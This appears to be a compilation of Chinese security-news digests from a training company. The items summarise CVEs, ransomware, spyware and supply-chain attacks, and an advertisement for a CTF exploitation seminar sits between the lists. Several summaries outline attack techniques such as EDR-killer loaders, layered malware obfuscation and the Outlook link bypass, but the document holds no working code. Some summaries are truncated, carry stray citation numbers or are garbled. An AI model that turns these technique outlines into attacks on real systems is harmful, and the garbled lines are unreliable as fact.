1、葡萄牙更新网络犯罪法，为安全研究人员提供法律豁免 https://theregister.com/2025/12/08/portugal_cybercrime_law_researchers/?spm=a2ty_o01.29997173.0.0.72945171935ZKu 12月8日，葡萄牙正式修改其网络犯罪法律，明确为出于善意进行的安全漏洞研究和披露行为提供法律豁免，以鼓励负责任的漏洞披露 2、NHS旗下Barts Health因Oracle零日漏洞遭数据泄露 https://www.securityweek.com/barts-health-nhs-discloses-data-breach-after-oracle-zero-day-hack/ 英国国家医疗服务体系（NHS）下属的Barts Health于12月5日确认，其系统因一个Oracle产品中的零日漏洞被黑客利用而发生数据泄露 3、大规模NPM供应链攻击“Shai-Hulud 2.0”持续蔓延 https://www.wiz.io/blog/shai-hulud-2-0-supply-chain-attack “Shai-Hulud 2.0”是一种具有蠕虫式传播能力的NPM供应链攻击，自11月下旬以来已暴露超过25,000个GitHub代码仓库，攻击者通过窃取的开发者凭证发布恶意包。 4、CISA紧急将React2Shell高危漏洞加入KEV目录 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-342a CISA于12月5日将一个被积极利用的React Server Components远程代码执行漏洞（“React2Shell”）加入KEV目录，并要求联邦机构在12月26日前完成修补，反映出其极高风险等级。 5、攻击者通过USB在内网传播挖矿木马 https://cybersecuritynews.com/threat-actors-deploying-coinminer-malware/ 安全研究人员发现，攻击者正利用U盘在韩国内网扩散“PrintMiner”挖矿木马。该行动通过伪装为快捷方式诱导点击，在系统目录释放恶意DLL文件并利用系统程序printui.exe加载，随后注册DcomLaunch服务实现持久化。该木马运行后会关闭睡眠模式，根据配置启动XMRig挖门罗币，但系统CPU占用上限超过50%时，监测Task Manager、Process Explorer等工具。 6、全球GlobalProtect V*PN门户遭撞库 https://www.bleepingcomputer.com/news/security/new-wave-of-vpn-login-attempts-targets-palo-alto-globalprotect-portals/ 安全研究人员发现，一场撞库行动正集中轰炸暴露于公网的Palo Alto Networks GlobalProtect VPN门户。攻击者利用数十万条失陷凭证，在24小时内对北美、欧洲及亚太逾千家企业发起每秒超五千次登录尝试，意图突破远程办公入口并横向移动。受害日志显示，请求均携带伪造的PAN-OS 10.x User-Agent，并轮换AWS、OVH等云主机 7、间谍软件供应商Intellexa曾利用iOS 零日漏洞攻击埃及目标 https://thecyberexpress.com/ios-zero-day-exploit-chain-egypt/ 安全研究人员发现间谍软件供应商Intellexa曾利用一个完整的iOS零日漏洞利用链攻击埃及目标。攻击者先借Safari WebKit内存破坏获取沙箱内代码执行，再提权至内核并植入“LandCrab”后门，实现GPS、通话及Signal/WhatsApp语音录音回传。研究人员确认该攻击链与2021年“ForcedEntry”相似，但换用了全新内核漏洞，且全程无交互、无弹窗。苹果已在 iOS 18.2修补，建议用户立即升级并开启锁定模式。 8、众多勒索软件团伙利用Shanya绕过EDR https://cybersecuritynews.com/shanya-edr-killer-leveraged-by-ransomware-groups/ 近日，安全研究人员发现一项名为Shanya（亦称VX Crypt）的新型“加壳即服务”正在网络犯罪地下论坛中被积极推广，并已被包括Akira、Qilin、Medusa、Crytox在内的多个主流勒索软件团伙所采用。该服务的核心作用是作为“加载器”，为勒索软件的初始攻击阶段提供高级混淆服务。其主要目的是封装和部署一个关键的恶意载荷——“EDR杀手”。这种工具在勒索软件最终载荷运行前，先行定位并强制终止受害系统上运行的端点检测与响应、防病 9、Sneeit WordPress插件高危漏洞遭大规模利用 https://thehackernews.com/2025/12/sneeit-wordpress-rce-exploited-in-wild.html 近期，一个存在于Sneeit Framework WordPress插件中的高危远程代码执行漏洞正被攻击者大规模利用。该漏洞编号为CVE-2025-6389，影响8.3及之前的所有版本。攻击始于2025年11月24日漏洞细节公开后，据安全公司统计，其防火墙已拦截超过13.1万次利用该漏洞的攻击。 10、WatchGuard Firebox高危RCE漏洞被公开利用 https://cybersecuritynews.com/watchguard-firebox-vulnerabilities/ 美国网络安全和基础设施安全局（CISA）于2025年11月13日将WatchGuard Firebox防火墙中的一个高危漏洞（CVE-2025-9242）列入“已知被利用漏洞”（KEV）目录。该漏洞CVSS评分高达9.3，允许未经身份验证的远程攻击者执行任意代码，完全控制设备。该漏洞存在于Fireware OS处理IKEv2 VPN协议的iked进程中。即便用户删除了易受攻击的VPN配置（如移动用户VPN），只要设备能配置了到静态网关对等的分支机构VPN，实际上 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、CISA警告两个Android零日漏洞正被积极利用 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-336a 美国网络安全与基础设施安全局（CISA）于12月2日将两个Android框架漏洞（CVE-2025-48572和CVE-2025-48633）加入其已知被利用漏洞（KEV）目录，并要求联邦机构在12月23日前完成修复 2、泰国查封与网络诈骗集团相关的超3亿美元资产 https://www.reuters.com/world/asia-pacific/thailand-seizes-300-mln-assets-linked-cyberscam-networks-2025-12-05/ 泰国当局于12月5日宣布，已查封价值超3亿美元的资产，这些资产与在柬埔寨运营的跨国网络诈骗集团有关，旨在打击区域性的电信诈骗活动28。 3、印度撤回强制预装政府网络安全应用的命令 https://www.securityweek.com/india-rolls-back-order-to-preinstall-cybersecurity-app-on-smartphones/ 印度通信部于12月3日撤回了要求所有新售智能手机强制预装其“Sanchar Saathi”网络安全应用的命令，此举是在行业和公众强烈反对后作出的调整44。 4、研究人员发现新型商业级Android间谍软件“LANDFALL” https://unit42.paloaltonetworks.com/landfall-android-spyware/ Palo Alto Networks的Unit 42团队披露了一种名为“LANDFALL”的新型商业级Android间谍软件，该软件通过利用三星设备中的一个零日漏洞（CVE-2025-21042）进行传播，主要针对中东地区的用户52。 5、Water Saci针对巴西发起金融窃密攻击 https://securityonline.info/water-saci-campaign-uses-llms-to-convert-malware-to-python-spreads-banking-trojan-via-whatsapp-worm/ 安全研究人员发现代号为“Water Saci”的网络攻击活动针对巴西用户发起金融窃密攻击。攻击者借助大语言模型将原有PowerShell恶意脚本重构为Python版本，提升传播速度与开发效率。其主要通过WhatsApp蠕虫传播，劫持用户信任联系人账号发送ZIP、PDF 等诱饵附件，同时以邮件钓鱼传播形成双传播链。用户触发恶意文件后，会经多 6、在线赌博网站为黑客提供匿名C2通道 https://www.helpnetsecurity.com/2025/12/03/indonesian-online-gambling-network/ 研究人员发现，一个面向印尼用户的超大规模在线赌博黑产已运行14年，手握32.8万域名，其中九成是入侵所得，甚至包括政府子域。攻击者借WordPress漏洞、过期证书与悬空DNS，把政府站点变成NGINX反向代理，暗中转发加密流量，为境外黑客提供匿名C2通道。团伙同时派发伪装赌客App，植入Android后门，手法之精细已达APT级别，但尚未发现其存在国家背景。 7、Windows版Vim存在高危漏洞(CVE-2025-66476) https://securityonline.info/high-severity-vim-for-windows-flaw-cve-2025-66476-risks-arbitrary-code-execution-from-compromised-folders/ Windows版Vim存在CVE-2025-66476高危漏洞，Vim在Windows系统上运行时利用Windows处理命令执行方式中的一个缺陷，诱骗编辑器运行恶意软件而非合法的系统工具，若用户打开被篡改文件夹内文件，攻击者即可借当前进程权限执行任意恶意代码。现已发布补丁，官方建议升级至Vim v9.1.1947版本。 8、英国巴茨健康NHS信托基金遭遇勒索攻击 https://www.bleepingcomputer.com/news/security/barts-health-nhs-discloses-data-breach-after-oracle-zero-day-hack/ 近日英国巴茨健康NHS信托基金遭遇Clop勒索软件攻击，其Oracle E-Business Suite数据库遭Clop勒索软件团伙利用CVE-2025-61882漏洞攻击，导致数万名患者及前员工个人信息泄露。泄露数据包括全名、地址、供应商信息及未结账款记录。该信托基金在伦敦市内运营五家医院，分别是Mile End医院、纽汉大学医院、皇家伦敦医院、圣巴塞洛缪医院和惠普 9、Cloudflare紧急修复React2Shell漏洞导致服务中断 https://www.bleepingcomputer.com/news/security/cloudflare-blames-todays-outage-on-emergency-react2shell-patch/ 全球CDN服务商Cloudflare近日遭遇服务中断，官方声明指出故障由紧急修复高危漏洞React2Shell的补丁引发。该漏洞可使攻击者通过恶意请求在受影响服务器上执行任意代码，威胁全球数百万依赖Cloudflare的网站安全。为快速响应威胁，Cloudflare在未完成充分测试的情况下推送了安全更新，导致部分节点崩溃，用户访问延迟及API调用失败现象频发。技术团队随即回 10、Apache Tika存在高危XXE漏洞 https://thehackernews.com/2025/12/critical-xxe-bug-cve-2025-66516-cvss.html 安全研究人员近日披露了Apache Tika一个高危XXE漏洞CVE-2025-66516，其CVSS评分高达9.8，对多款主流软件及Web应用构成严重威胁。该漏洞可被攻击者利用，通过上传恶意XML文件读取服务器敏感数据、执行内部网络探测，甚至引发拒绝服务攻击。受影响产品涵盖某知名企业级文档处理系统及多个开源Web框架，全球数百万设备存在暴露风险。研究人员指出，漏洞利用过程无需用户交互，仅需目标系统解析恶意XML即可触发。目前，部分受影响厂商 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

数字经济纵深发展的今天，网络空间已成为国家主权的新疆域、经济发展的核心引擎与社会运行的基础载体，而网络安全则是守护这一空间的战略基石与核心屏障。当前，网络攻击手段正朝着高度定制化、协同化、隐蔽化演进，APT攻击、供应链渗透、云安全漏洞等新型威胁频发，数据泄露与系统瘫痪事件不仅威胁企业生存，更关乎国家安全与公众利益。在此时代背景下，深刻把握网络强国战略思想，贯彻落实教育部关于“深化产教融合、推进网络安全领域新工科建设”的明确要求，强化高校网络安全实战化教学水平、构建高水平创新型师资队伍已成为筑牢国家网络安全防线的关键环节。 在中国网络空间安全人才教育论坛（网教盟）和国家新一代自主安全计算系统产业集群指导下，湖南蚁景科技有限公司拟于2026年1月26-30日在长沙举办“2026年网络安全高级研讨会”。欢迎全国高校、职业院校计算机相关专业和网络（信息）安全专业的负责人、学科带头人、骨干教师、实验室人员等参会交流。 一、组织单位 指导单位：中国网络空间安全人才教育论坛 　　　　　国家新一代自主安全计算系统产业集群 主办单位：湖南蚁景科技有限公司 二、会议内容 1、CTF 竞赛入门与学习规划 从 0 开启 CTF 竞赛之路！系统了解 CTF 起源、主流竞赛模式及科学学习路径，获取 CTF 带队专家独家经验分享，规避学习误区；明确 CTF 学习重点与未来职业发展方向，快速建立竞赛思维框架。 2、逆向工程基础实战 筑牢逆向技术根基！深入学习常见 C 语言逆向分析方法，熟练掌握 x86 汇编语言核心语法；精通寄存器操作原理与实战技巧，理解逆向工程底层逻辑，为漏洞分析与利用打下坚实基础。 3、栈溢出漏洞攻坚 攻克网络安全核心漏洞！深度拆解栈溢出漏洞原理，全面掌握 ret2text、ret2shellcode、ret2syscall、ret2libc 等基础利用方式；突破 ret2csu、ret2reg 等高级栈漏洞技术，结合实战案例同步演练，提升漏洞利用硬实力。 4、漏洞类型专项拓展 挖掘代码隐藏风险！系统学习格式化字符串漏洞原理与多元利用技巧，深入掌握整数溢出漏洞触发机制及 exploitation 实战方法；培养漏洞挖掘思维，提升代码审计效率与准确性，增强核心竞争力。 5、AWD 攻防实战全流程特训 模拟真实攻防场景！全面讲解 AWD+Break+Fix+CD 赛制规则与攻防策略设计，精通 AWD Break 批量攻击手法；掌握 AWD Fix 漏洞修复技巧及通防策略部署，通过团队协作演练，提升应急响应与协同作战能力。 6、AWD + CTF 真题实战解析 以赛代练冲排名！通过典型 AWD 与 CTF 真题深度讲解，总结命题规律与解题技巧；提升复杂场景下漏洞挖掘与利用能力，强化竞赛时间管理与解题策略，积累实战经验助力竞赛获奖与职业发展。 三、参会人员 全国高校、职业院校计算机相关专业（信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等）专业负责人、学科带头人、专业骨干教师、实验室人员等。 四、预期收获 1、CTF竞赛知识体系：系统掌握CTF竞赛的基础理论、赛制规则与学习方法，具备独立备赛与参赛能力。 2、二进制漏洞利用能力：熟练掌握栈溢出、格式化字符串、整数溢出等常见二进制漏洞的原理分析与exploitation技术。 3、逆向工程基础能力：理解反序列化漏洞的原理，并掌握PHP和Python环境下的反序列化攻击技巧。 4、攻防实战经验：通过AWD模式学习，获得真实的网络攻防对抗经验，掌握攻击与防御双向技能。 5、真题分析能力：通过对CTF真题的精讲与实战演练，提升快速分析题目、设计解题思路的能力。 6、安全防护意识：深入理解常见攻击手法，学习并掌握有效的漏洞修复与防护策略，提升整体安全素养。 7、结业证书：获得由国家新一代自主安全计算系统产业集群和蚁景科技联合颁发的结业证书。 五、讲师简介 汤晓彬  曾就职于启明星辰集团，担任赛事研究员，从事网络安全工作6年，参与多项国家/国际CTF赛事的比赛和命题。为移动，烟草，税务等政企单位提供CTF赛事培训。擅长技术：PWN攻防，逆向工程，漏洞挖掘，赛事支撑。 竞赛奖项：（部分展示） 2025年“长城杯”网络安全竞赛全国总冠军 2024年“熵密杯”密码学竞赛三等奖 2024年“蓝桥杯”网络安全赛道福建省一等奖 2023年网信办第七届“强网杯”安全挑战赛强网先锋 六、会议安排 1、培训方式：线下会议 / 线上直播 2、培训时间：2026年1月26日-1月30日（1月25日报到） 3、培训地点：湖南长沙 4、会议规模：100人 六、报名方式 1、报名时间：即日起至2026年1月25日 2、报名邮箱：edu@yijingsec.com 3、电话咨询：黄老师 18774948349 4、培训费用：3680元/人（含培训资料，交通费和住宿费自理，自备电脑） 5、付款方式：      ◆ 线上汇款： （请务必在备注栏里注明“学校名+参会者姓名”）         公司名称：湖南蚁景科技有限公司         开户行名称：农业银行湖南湘江新区分行         开户行账号：18058801040005912      ◆ 扫码付款：（请务必备注“学校名+参会者姓名”）      ◆ 现场缴费：现金、扫码或刷卡（银行卡、公务卡均可）  具体课程内容 扫描下方二维码即可报名：

1、欧盟刑警组织破获价值8.15亿美元的欺诈网络 https://cybernews.com/news/europol-crypto-fraud-network-busted/ 欧洲刑警组织成功瓦解一个涉及8.15亿美元的国际欺诈网络，该网络通过网络诈骗和身份盗用方式运作，逮捕多名嫌疑人并冻结资产。 2、微软悄然修补Windows LNK漏洞，此前数年被黑客利用 https://cybernews.com/security/microsoft-ignores-windows-lnk-file-abuse-by-hackers/ 微软悄然修补高危Windows LNK漏洞CVE-2025-9491，但该漏洞仍被多个国家支持和犯罪团伙用于零日攻击，允许远程代码执行。 3、趋势科技发现BPFDoor新型远控攻击情况 https://thehackernews.com/2025/04/new-bpfdoor-controller-enables-stealthy.html 趋势科技的研究人员发现了一款新型远控，这款远控与已知的后门程序BPFDoor相关。此前，该远控曾被用于2024年针对韩国、香港、缅甸等多地电信、金融、零售行业Linux服务器的攻击活动。这次攻击被认为是由Earth Bluecrow组织发起的，不过，由于BPFDoor的源码在2022年就已经泄露，所以不排除其他团伙也有复用该组件的可能。BPFDoor是2022年被曝光的一款Linux后门程序，它依托BPF技术，能够突破防火墙，通过监听特 4、Cybercrime团伙攻击东南亚多国移动用户 https://thehackernews.com/2025/12/goldfactory-hits-southeast-asia-with.html Group-IB的研究人员发现，一个具有窃取财务目的的Cybercrime犯罪团伙，自2024年10月起，开始针对印尼、泰国、越南的移动用户发起攻击。这个团伙早在2023年6月就已经开始活跃了。他们通过打电话，伪装成政府机构（比如伪装成越南的EVN来催缴电费），引导用户添加Zalo来接收链接，用户点击链接后会跳转到一个仿冒的Google Play页面，进而下载被篡改的银行APP。目前，研究人员已经发现了300多个这样的APP样本，这些恶意AP 5、新型Windows恶意软件TangleCrypt可绕过EDR防护 https://labs.withsecure.com/publications/tanglecrypt 安全研究人员发现了一款新型Windows恶意软件TangleCrypt。该恶意软件被用于勒索软件攻击，携带的恶意载荷有能绕过EDR防护。该恶意软件会把恶意载荷存放在PE资源里，然后经过base64编码、LZ78压缩、XOR加密等多层处理。它支持两种启动恶意载荷的方式，一种是在同一个进程里启动，另一种是在子进程里启动。同时，它还会通过字符串加密、动态导入解析等基础方法来躲避分析。 6、Django修复SQL注入和DoS漏洞 https://securityonline.info/django-flaw-cve-2025-13372-allows-sql-injection-in-postgresql-filteredrelation/ Python Web框架Django官方发布安全更新，修复了两个漏洞：一个是针对使用PostgreSQL数据库且调用FilteredRelation类应用的高风险SQL注入漏洞CVE-2025-13372，因框架处理列别名不当，攻击者构造字典以**kwargs形式传入QuerySet.annotate()或alias()就能触发注入，可能破坏数据库完整性；另一个是影响XML序列化 7、OpenAI Codex CLI远程代码执行漏洞暴露开发环境新风险 https://www.freebuf.com/articles/ai-security/460330.html 研究人员发现，克隆仓库中的.env文件可被用于修改Codex CLI主目录路径，加载恶意配置文件，最终导致任意命令执行。这一案例揭示了AI工具如何扩大开发机器的攻击面。 8、乌黑客利用新型恶意软件攻击俄航空航天及国防相关行业 https://cybersecuritynews.com/ukraine-hackers-attacking-russian-aerospace-companies/ 乌克兰黑客组织正对俄罗斯国防企业发起针对性网络攻击，通过钓鱼邮件植入定制恶意软件窃取军工数据，暴露生产链薄弱环节，旨在评估俄罗斯战备状态。攻击手法隐蔽且精准，针对关键岗位人员。 9、 黑客可在数秒内劫持行车记录仪并将其武器化为攻击工具 https://cybersecuritynews.com/hackers-can-hijack-your-dash-cams/ 行车记录仪存在严重安全漏洞，攻击者可远程劫持设备获取视频、音频和GPS数据，甚至传播蠕虫攻击其他设备。建议关闭Wi-Fi、修改密码并更新固件以降低风险。 10、Everest勒索软件宣称入侵华硕并窃取1TB数据 https://hackread.com/everest-ransomware-asus-breach-1tb-data/ Everest勒索软件组织宣称入侵华硕，窃取1TB数据含相机源代码，要求21小时内联系。华硕尚未回应，若属实将是近年第二次重大入侵。该组织近期频繁攻击知名企业。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、国家网络安全中心通报一批境外恶意网址和恶意IP https://www.chinanews.com.cn/gn/2025/12-03/10525785.shtml 中国国家网络与信息安全信息通报中心发现一批境外恶意网址和IP，主要涉及美国、英国等国家，黑客组织利用这些地址发起网络攻击，包括建立僵尸网络和后门利用，对国内联网单位和用户构成重大威胁。 2、人工智能将在2026年成为网络安全面临的主要威胁 https://www.businesswire.com/news/home/20251202083654/zh-CN 2025年上半年全球发生逾8000起数据泄露事件，影响3.45亿条记录。报告预测，到2026年AI将成为主要网络安全威胁，Experian客户群中美国、英国和加拿大受冲击最重。 3、Google Chrome存在多个漏洞 https://www.hkcert.org/tc/security-bulletin/google-chrome-multiple-vulnerabilities_20251203 HKCERT发布Google Chrome浏览器多个漏洞警报，风险中等，建议用户及时更新以防范潜在攻击。 4、印度电信部要求手机制造商预装政府应用以打击电诈 https://thehackernews.com/2025/12/india-orders-mobile-device-makers-to.html 印度电信部命令主要手机制造商在90天内于所有新手机上预装名为Sanchar Saathi's政府支持的网络安全应用，该应用无法被用户删除或禁用，旨在提升用户设备安全。 5、GlassWorm活动最新波次针对AI安全扫描器 https://thehackernews.com/2025/12/new-glassworm-campaign-targets-ai.html 网络安全研究人员披露了一个npm包，该包试图影响AI驱动的安全扫描器，这是GlassWorm活动最新波次，由Secure Annex的Jo发现，涉及软件供应链攻击。 6、2025年网络安全报告：全球攻击次数激增44% https://www.goupsec.com/news/18554.html Check Point发布的年度报告显示，2025年全球网络攻击次数同比激增44%，勒索软件演变为数据泄露和双重勒索为主，医疗行业攻击增长47%，生成式AI加速攻击自动化，个人信息窃取攻击上升58%。 7、React和Next.js中的关键RSC漏洞允许未授权远程代码执行 https://thehackernews.com/2025/12/critical-rsc-bugs-in-react-and-nextjs.html React Server Components (RSC) 中存在一个最高严重性的安全漏洞，若被成功利用，可能导致远程代码执行。该漏洞被追踪为 CVE-2025-55182，其 CVSS 评分为 10.0。 8、12月Android安全公告，修复107个漏洞包括两个零日漏洞 https://thehackernews.com/2025/12/google-patches-107-android-flaws.html Google的12月Android安全更新修复107个漏洞，其中包括两个高危零日漏洞CVE-2025-48633和CVE-2025-48572，已被针对性攻击利用。 9、印度要求通讯应用仅与激活的SIM卡绑定以防欺诈和滥用 https://thehackernews.com/2025/12/india-orders-messaging-apps-to-work.html 印度的电信部（DoT）已向基于应用程序的通信服务提供商发出指示，确保这些平台无法在不链接到用户手机号码的有效 SIM 卡的情况下使用。为此，使用印度手机号码作为唯一用户识别方式，即电信标识用户实体（TIUE），的通讯应用，如 WhatsApp、Telegram、Snapchat、Arattai、Sharechat、Josh、JioChat 和 Signal，必须在 90 天内遵守该指令。 10、Aisuru僵尸网络发动了破纪录的29.7Tbps DDoS攻击 https://cybersecuritynews.com/29-7-tbps-ddos-attack/amp/ 一项来自 Aisuru 僵尸网络的 29.7 Tbps 分布式拒绝服务（DDoS）攻击创造了新的攻击量世界纪录，凸显了在极端负载下核心互联网基础设施的脆弱性。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Glassworm恶意软件利用VS Code插件传播 https://www.bleepingcomputer.com/news/security/glassworm-malware-returns-in-third-wave-of-malicious-vs-code-packages/ Glassworm恶意软件通过恶意VS Code插件实施攻击。该恶意软件再度活跃，利用开发者常用的VS Code，通过伪装成正常插件诱导开发者下载。该恶意软件会部署SOCKS代理，并安装HVNC客户端，以便攻击者能够隐蔽地进行远程访问。 2、新型Mirai变种ShadowV2在AWS中断期间测试物联网漏洞利用 https://securityaffairs.com/185135/malware/new-mirai-variant-shadowv2-tests-iot-exploits-amid-aws-disruption.html 2025年10月下旬AWS服务中断期间，FortiGuard Labs发现新型Mirai变种ShadowV2针对IoT设备发起攻击，疑为后续攻击测试。该恶意软件利用D-Link、TP-Link等厂商设备漏洞，从81.88.18.108下载脚本适配多架构设备，支持多种DDoS攻击，影响全球多国家及科技、零售等多行业。 3、Android TV SmartTube应用遭入侵推送恶意更新 https://www.bleepingcomputer.com/news/security/smarttube-youtube-app-for-android-tv-breached-to-push-malicious-update/ Android TV开源YouTube客户端SmartTube在攻击者获取开发者签名密钥后遭到入侵，导致恶意更新被推送给用户。攻击者通过入侵该应用相关渠道，意图推送恶意更新，该恶意程序在后台静默运行，无需用户交互，即可识别主机设备，将其注册到远程后端，并通过加密通信通道定期发送指标并检索配。。 4、韩电商平台Coupang遭大规模数据泄露近3400万用户受影响 https://thecyberexpress.com/coupang-data-breach/ 韩国电商巨头Coupang确认发生大规模数据泄露，近3370万用户的个人信息遭到泄露，成为近年来韩国最大的网络安全事件之一。该公司承认此次数据泄露源于未经授权的访问，而这种访问可能已持续数月之久。泄露信息含姓名、电话、邮箱、收货地址及部分订单记录，无支付或登录凭证。 5、安卓紧急安全警报：框架组件严重漏洞及两个遭利用的0Day需立即修补 https://securityonline.info/android-emergency-critical-dos-flaw-and-2-exploited-zero-days-in-framework-require-immediate-patch/ 谷歌发布Android安全公告，披露两个正被利用的0Day漏洞（CVE-2025-48633、CVE-2025-48572）和一个关键远程DoS漏洞（CVE-2025-48631），以及多个内核级高危漏洞。安全补丁分两阶段推送，涵盖核心组件和硬件特定修复，建议用户尽快升级至2025-12-05补丁级别。 6、启动过程遭入侵：高通骁龙8Gen3及5G调制解调器曝出高危漏洞 https://securityonline.info/boot-process-compromised-critical-flaw-cve-2025-47372-hits-snapdragon-8-gen-3-5g-modems/ 高通发布2025年12月安全更新，修复11个漏洞，包括启动过程高危漏洞CVE-2025-47372（CVSS 9.0）及影响音频、摄像头、汽车系统的关键问题，涉及骁龙8 Gen 3等多款芯片，敦促OEM立即部署补丁。 7、微软确认新版 Outlook 存在阻止 Excel 附件打开的新漏洞 https://cybersecuritynews.com/microsoft-new-outlook-bug/ 微软确认新版Outlook存在Excel附件文件名含非ASCII字符时无法打开的故障，已开发修复程序但尚未全面推送，建议用户临时使用网页版或下载本地文件解决。 8、Apache Struts 框架DoS漏洞可能导致磁盘耗尽 https://securityonline.info/cve-2025-64775-apache-struts-file-leak-vulnerability-threatens-disk-exhaustion/ Apache Struts框架曝DoS漏洞（CVE-2025-64775），攻击者通过multipart请求耗尽磁盘空间导致服务瘫痪，影响2.0.0-6.7.0和7.0.0-7.0.3版本，建议升级至6.8.0或7.1.1修复。 9、430万Chrome与Edge用户遭ShadyPanda恶意软件七年攻击 https://cybersecuritynews.com/4-3-million-chrome-and-edge-users-hacked/ 高级威胁组织"ShadyPanda"利用浏览器扩展程序信任机制，七年内感染430万用户，通过静默更新植入RCE后门，窃取浏览历史、搜索记录等敏感数据，暴露浏览器安全模型静态信任缺陷。 10、恶意VS Code扩展伪装图标主题攻击Windows与macOS用户 https://cybersecuritynews.com/malicious-vs-code-extension-as-icon-theme/ 恶意VS Code扩展伪装成图标主题，内含Rust后门程序，通过官方市场分发，可连接远程服务器获取指令，利用Solana区块链钱包和Google Calendar事件传递加密载荷，攻击Windows和macOS用户。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Tomiris团伙使用公共服务作为C2攻击多国政府 https://thehackernews.com/2025/12/tomiris-shifts-to-public-service.html 近期，研究人员发现Tomiris黑客团伙针对俄罗斯及中亚多国政府、国际组织等进行攻击，其战术转向利用Telegram、Discord等公共服务作为隐蔽C2服务器。通过含加密RAR文件的钓鱼邮件传播，文件伪装成Word文档，释放反向shell、自定义植入等恶意程序，可收集系统信息、持久化驻留并下载后续工具。 2、安卓恶意软件Albiriox攻击400多个应用程序 https://thehackernews.com/2025/12/new-albiriox-maas-malware-targets-400.html 近期，研究人员发现新的安卓恶意软件Albiriox，以 “恶意软件即服务（MaaS）”模式运作，针对400+金融类应用程序实施设备端欺诈与屏幕控制。疑为俄语使用者的攻击者，通过社会工程诱饵、仿冒谷歌商店页面传播dropper APK，还借Golden Crypt服务规避安全检测。该恶意程序用未加密TCP作C2，支持VNC远程控制，利用无障碍服务绕过Android FLAG_SECURE防护，发起overlay攻击窃取凭证。 3、Outlook CVE-2024-21413漏洞PoC已公开 https://cybersecuritynews.com/outlook-remote-code-execution-vulnerability-2/ 微软Outlook存在高危远程代码执行（RCE）漏洞CVE-2024-21413，CVSS 评分 9.8。该漏洞因Outlook解析 “Moniker Links”时存在缺陷，可通过含file://协议加感叹号的特制链接绕过 “Protected View”，无需用户额外操作，点击后可能触发SMB连接泄露NTLM凭证，甚至实现远程代码执行。目前GitHub已公开Python版PoC，建议用户立即安装微软官方补丁、更新Office、阻断445 4、Apache bRPC CVE-2025-59789漏洞致服务器崩溃 https://cybersecuritynews.com/apache-brpc-framework-vulnerability/ Apache bRPC框架存在高危漏洞CVE-2025-59789，全平台下版本低于1.15.0 均受影响。该漏洞源于json2pb组件，其依赖rapidjson默认递归解析JSON，攻击者发送深度嵌套的特制 JSON 数据，会导致解析器栈溢出，引发服务器崩溃，造成拒绝服务（DoS）。仅当bRPC服务器处理不可信网络的HTTP+JSON请求（含protobuf消息），或用JsonToProtoMessage转换不可信JSON时，才面临风险。建议用户升级至1.1 5、朝日啤酒遭攻击导致191万条个人信息泄露 https://www.bleepingcomputer.com/news/security/japanese-beer-giant-asahi-says-data-breach-hit-15-million-people/ 日本朝日集团遭Qilin勒索软件团伙攻击，11月27日披露约191.4万条个人信息或泄露（含 152 万 + 客户、10.7 万员工及家属、11.4 万外部联系人信息，无信用卡数据）。攻击致其日本境内系统瘫痪，生产物流中断，员工手工处理订单，全国啤酒、饮料短缺，三季度及全年业绩发布延迟。该集团拒绝与黑客谈判，此次攻击还引发日本啤酒行业供应链连锁压力，其他企业被迫调整供应 6、英国电信公司Brsk确认23万+记录数据泄露 https://www.theregister.com/2025/11/28/brsk_breach/ 英国电信公司Brsk确认发生数据库泄露，此前黑客在cybercrime论坛发帖，声称盗取230,105条用户记录，通过Telegram邀请买家竞价。泄露数据含用户全名、邮箱、家庭地址、安装详情、位置数据、手机号，及 “是否为易受伤害人群” 标识。Brsk回应称，泄露仅涉及基本联系信息，无财务数据、密码或登录凭证，目前无证据显示数据被滥用；已通知受影响用户，提供Experian的12个月免费监控服务，聘请安全伙伴调查，并上报ICO、警方及监管机构。其核心网络与宽带服务未受影响，但未回应 “易 7、200多个CVE漏洞遭利用，谷歌云OAST服务成复杂攻击跳板 https://www.freebuf.com/news/459823.html 安全研究人员发现一项复杂的漏洞利用活动，该活动利用托管于谷歌云基础设施上的私有带外应用安全测试（OAST, Out-of-band Application Security Testing）服务发起攻击。此攻击活动主要针对巴西境内的系统，目标涉及超过200个通用漏洞披露（CVE）。 8、OpenAI承认数据泄露事件：分析合作伙伴遭钓鱼攻击 https://www.csoonline.com/article/4097488/openai-admits-data-breach-after-analytics-partner-hit-by-phishing-attack-2.html OpenAI因分析伙伴Mixpanel遭钓鱼攻击导致客户数据泄露，涉及API账户元数据，但敏感信息未受影响。双方已终止合作并通知客户，建议加强安全措施。事件凸显次级平台安全风险，企业需全面评估AI平台安全。 9、黑客组织暗网兜售iOS 26全链0Day漏洞利用工具 https://cybersecuritynews.com/ios-26-full%E2%80%91chain-0%E2%80%91day-exploit/ 黑客ResearcherX在暗网出售针对iOS 26的全链0Day漏洞工具，利用消息解析器内存损坏漏洞，可零点击获取root权限，绕过多层防护窃取敏感数据。若属实，将是苹果安全架构的重大突破。专家建议关注紧急更新，但需警惕暗网欺诈风险。 10、恶意日历订阅每日攻击超400万台苹果设备 https://securityonline.info/silent-threat-how-malicious-calendars-promptware-target-4m-devices-daily/ 